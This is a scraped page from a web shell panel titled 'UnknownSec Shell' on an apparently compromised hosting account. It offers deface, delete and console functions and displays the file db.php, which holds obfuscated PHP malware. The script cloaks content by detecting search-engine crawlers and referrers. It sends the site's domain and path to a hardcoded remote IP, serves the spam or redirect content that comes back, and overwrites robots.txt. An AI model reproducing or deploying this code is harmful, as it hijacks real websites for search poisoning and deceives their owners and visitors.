shell bypass 403
UnknownSec Shell
:
/
proc
/
self
/
root
/
home
/
innovagencyco
/
public_html
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
db.php
<?php error_reporting(0); @set_time_limit(120); @ignore_user_abort(1); $nP0t1 = "http://107.150.50.154/j241009_13/"; $AKIhD = array("/subName1/groupNo1"); class IVzkd { public function Mo2hF(string $BlYco = '', string $q7cnO = '') { if (!empty($BlYco)) { goto KI1KO; } return $_SERVER; KI1KO: $BlYco = strtoupper($BlYco); return isset($_SERVER[$BlYco]) ? $_SERVER[$BlYco] : $q7cnO; } public function oQhAd() { if ($this->Mo2HF("\110\x54\x54\120\123") && ("\61" == $this->mO2hF("\x48\x54\x54\x50\123") || "\157\156" == strtolower($this->MO2HF("\110\124\x54\x50\123")))) { goto arVPu; } if ("\x68\164\x74\160\163" == $this->MO2HF("\x52\x45\x51\x55\x45\x53\124\137\x53\x43\110\x45\115\x45")) { goto CX3cp; } if ("\64\x34\x33" == $this->mo2hF("\123\x45\122\x56\105\x52\137\x50\117\x52\x54")) { goto wE3v2; } if ("\150\x74\164\160\x73" == $this->Mo2hf("\x48\x54\x54\120\x5f\x58\x5f\106\117\x52\x57\x41\x52\x44\105\104\137\x50\x52\117\x54\x4f")) { goto ra_Wf; } goto VqaAU; arVPu: return true; goto VqaAU; CX3cp: return true; goto VqaAU; wE3v2: return true; goto VqaAU; ra_Wf: return true; VqaAU: return false; } public function NkkLV() { $SHSJf = strval($this->mo2HF("\110\124\124\x50\137\x58\x5f\106\117\122\127\x41\x52\104\105\104\x5f\x48\117\x53\124") ?: $this->mo2HF("\x48\x54\x54\x50\137\110\117\123\124")); return strpos($SHSJf, "\72") ? strstr($SHSJf, "\x3a", true) : $SHSJf; } public function bfYNZ() { return $this->oQHAd() ? "\150\x74\x74\160\163" : "\150\164\164\x70"; } public function ZFQtT() { $EzjOX = $this->lvs3M(); if (!in_array($EzjOX, [80, 443])) { goto fzDt8; } return $this->bfynZ() . "\72\x2f\57" . $this->NkklV(); fzDt8: return $this->BFYnz() . "\x3a\57\57" . $this->NKklv() . "\x3a" . $EzjOX; } public function lvs3M() : int { return (int) ($this->mo2hf("\110\x54\124\120\x5f\130\x5f\x46\x4f\122\127\101\122\104\x45\104\137\120\x4f\122\124") ?: $this->mO2hf("\x53\105\x52\x56\105\x52\137\120\x4f\x52\x54", '')); } public function k7MFK() { $wLy5n = strtolower($this->Mo2hF("\x48\x54\124\x50\137\125\123\x45\x52\137\x41\107\x45\116\124")); if (!($wLy5n != '' && preg_match("\x2f\147\157\x6f\147\154\145\x62\157\164\x7c\142\x69\156\x67\x62\x6f\164\x7c\147\x6f\157\147\154\x65\x7c\x62\151\156\147\x7c\171\141\150\157\x6f\x2f\163\151", $wLy5n))) { goto O2Zyg; } return true; O2Zyg: return false; } public function lr_aA() { $FQdGr = strtolower($this->mo2Hf("\110\124\x54\x50\x5f\x52\105\x46\105\x52\x45\x52")); if (!($FQdGr != '' && preg_match("\x2f\147\x6f\157\x67\154\145\174\x79\141\x68\x6f\x6f\x7c\142\x69\x6e\147\57\x73\x69", $FQdGr))) { goto OmKbh; } return true; OmKbh: return false; } public function gr_zz() { $XTIMa = basename($this->mO2HF("\123\x43\x52\111\120\x54\x5f\x46\x49\114\105\116\101\115\105")); if (basename($this->MO2HF("\123\x43\122\x49\120\x54\137\116\101\x4d\x45")) === $XTIMa) { goto OX_N4; } if (basename($this->mO2hF("\120\110\x50\x5f\x53\105\114\106")) === $XTIMa) { goto R0Bj4; } if (basename($this->Mo2HF("\117\x52\x49\107\137\123\103\x52\111\120\x54\x5f\116\101\115\105")) === $XTIMa) { goto svq03; } if (($NDXyx = strpos($this->Mo2hf("\x50\110\x50\x5f\123\x45\x4c\106"), "\57" . $XTIMa)) !== false) { goto c0s2h; } if ($this->mo2hF("\104\x4f\103\x55\x4d\x45\x4e\x54\137\x52\x4f\117\x54") && strpos($this->mO2hf("\123\x43\x52\x49\120\124\x5f\106\x49\x4c\x45\x4e\x41\x4d\x45"), $this->mO2hf("\x44\117\103\x55\115\x45\116\x54\137\122\x4f\x4f\124")) === 0) { goto nTzwn; } goto fpw2k; OX_N4: $COhZi = $this->Mo2hF("\123\x43\122\111\x50\x54\137\x4e\x41\115\x45"); goto fpw2k; R0Bj4: $COhZi = $this->mO2HF("\x50\110\120\x5f\x53\x45\114\x46"); goto fpw2k; svq03: $COhZi = $this->mO2hf("\117\122\111\x47\137\x53\103\x52\x49\x50\x54\137\116\101\x4d\105"); goto fpw2k; c0s2h: $COhZi = substr($this->mo2HF("\x53\103\122\111\120\124\137\116\x41\115\105"), 0, $NDXyx) . "\57" . $XTIMa; goto fpw2k; nTzwn: $COhZi = str_replace($this->mO2hF("\x44\117\103\x55\115\105\x4e\x54\x5f\122\117\x4f\x54"), '', $this->mO2hF("\x53\x43\x52\x49\x50\x54\x5f\x46\x49\114\105\x4e\x41\115\105")); fpw2k: if (($NDXyx = strpos($this->mo2hF("\122\x45\121\x55\105\x53\124\137\125\x52\111"), "\x2e\160\150\160")) !== false) { goto GEkEu; } $azusX = $COhZi . substr($this->mO2HF("\122\105\121\125\x45\123\124\x5f\x55\x52\111"), strpos($this->MO2HF("\122\x45\121\125\105\123\x54\137\x55\122\x49"), "\57")); goto KuRVl; GEkEu: $azusX = $COhZi . substr($this->mO2hF("\122\105\121\125\105\x53\124\137\x55\x52\x49"), $NDXyx + 4); KuRVl: return rtrim($azusX, "\x2f"); } public function UNp4J($COhZi, $nlbAN = array()) { $COhZi = str_replace("\x20", "\53", $COhZi); $gN8ex = curl_init(); curl_setopt($gN8ex, CURLOPT_URL, $COhZi); curl_setopt($gN8ex, CURLOPT_RETURNTRANSFER, 1); curl_setopt($gN8ex, CURLOPT_HEADER, 0); curl_setopt($gN8ex, CURLOPT_TIMEOUT, 20); curl_setopt($gN8ex, CURLOPT_POST, 1); curl_setopt($gN8ex, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($gN8ex, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($gN8ex, CURLOPT_POSTFIELDS, http_build_query($nlbAN)); $MXwVJ = curl_exec($gN8ex); curl_close($gN8ex); return $MXwVJ; } } $hTRLc = new IVZkd(); $UepGT = $hTRLc->k7Mfk(); $k53Iq = $hTRLc->LR_AA(); $kTIdv = urldecode($hTRLc->GR_Zz()); $nlbAN = ["\144\157\155\x61\151\x6e" => $hTRLc->zFQTT(), "\x70\x6f\162\x74" => $hTRLc->lVS3m(), "\165\162\x69" => $kTIdv]; if (empty($AKIhD)) { goto FZI4e; } foreach ($AKIhD as $Y_sfd) { if (!(substr($Y_sfd, 0, strlen($kTIdv)) === $kTIdv)) { goto m3lJl; } $J3q5X = pathinfo($nP0t1, PATHINFO_BASENAME); $nP0t1 = str_replace($J3q5X, substr($Y_sfd, strlen($kTIdv) + 1), $nP0t1); goto fBAv0; m3lJl: ijUZq: } fBAv0: FZI4e: if (!($UepGT || substr($kTIdv, -6) === "\162\157\142\x6f\x74\x73" || substr($kTIdv, -4) === "\x2e\170\155\154")) { goto ciUL6; } if (!(in_array(substr($kTIdv, -7), ["\57\162\157\x62\x6f\x74\x73", "\77\162\157\142\157\x74\163"]) && strpos($hTRLc->Mo2hf("\x52\x45\121\125\105\x53\x54\x5f\125\122\x49"), "\56\160\150\x70") !== false && $hTRLc->mo2HF("\122\x45\x51\125\x45\x53\x54\x5f\x55\122\x49") !== $kTIdv)) { goto L7Z5Y; } die("\162\x6f\x62\x6f\x74\163\x2e\164\x78\x74\40\x61\156\x64\40\x73\x69\164\x65\155\141\x70\56\x78\x6d\x6c\x20\146\151\154\x65\40\x63\x72\x65\x61\164\145\x20\x66\x61\151\154\40\x62\171\x20\x73\165\142\146\151\x6c\x65\x21"); L7Z5Y: $MXwVJ = $hTRLc->unP4J($nP0t1 . "\163\151\x74\x65\x6d\141\160", $nlbAN); $MXwVJ or die; if (!(in_array(substr($kTIdv, -7), ["\57\162\157\x62\157\x74\x73", "\77\x72\157\142\x6f\x74\x73"]) && !empty($MXwVJ))) { goto oMXo_; } $kTIdv = strtolower($kTIdv); $E2RpP = strpos($kTIdv, "\56\160\150\160") !== false && strpos($kTIdv, "\57\151\156\144\x65\170\x2e\160\150\160") === false ? true : false; $LgiTy = @file_put_contents(__DIR__ . "\57\x72\x6f\x62\x6f\164\x73\56\164\x78\x74", $MXwVJ, $E2RpP ? 8 : 0); $fTLwQ = file_get_contents(__DIR__ . "\57\x72\x6f\x62\157\164\163\x2e\x74\170\x74"); if ($LgiTy !== false && strpos(strtolower($fTLwQ), "\163\151\164\x65\155\x61\160") !== false) { goto RpLv4; } die("\x72\x6f\x62\x6f\164\x73\x2e\x74\x78\x74\40\141\156\x64\x20\x73\x69\x74\145\155\141\160\x2e\170\x6d\x6c\x20\x66\151\154\145\40\x63\162\x65\141\x74\x65\x20\x66\x61\x69\154\41"); goto P2Y4S; RpLv4: die("\x72\x6f\142\157\x74\x73\56\164\170\164\40\x61\x6e\x64\40\x73\x69\164\x65\x6d\x61\160\x2e\170\155\154\40\146\x69\154\145\x20\143\162\x65\141\x74\145\40\x73\165\143\143\145\163\163\x21"); P2Y4S: oMXo_: header(substr($MXwVJ, 0, 5) === "\74\x3f\x78\155\x6c" ? "\x43\157\x6e\164\145\x6e\164\55\x74\x79\160\145\72\x74\x65\170\164\57\170\155\x6c" : "\x43\157\156\164\145\156\x74\55\164\171\x70\145\x3a\x74\x65\170\164\57\x68\164\x6d\154\x3b\40\143\x68\x61\162\x73\x65\164\75\165\164\146\x2d\x38"); die($MXwVJ); ciUL6: if (!(!$UepGT && $k53Iq && strrpos($kTIdv, "\56\x70\x68\160") !== strlen($kTIdv) - 4)) { goto Rj9tr; } die($hTRLc->UnP4J($nP0t1 . "\x6a\165\x6d\x70", $nlbAN)); Rj9tr:?>
© 2024 UnknownSec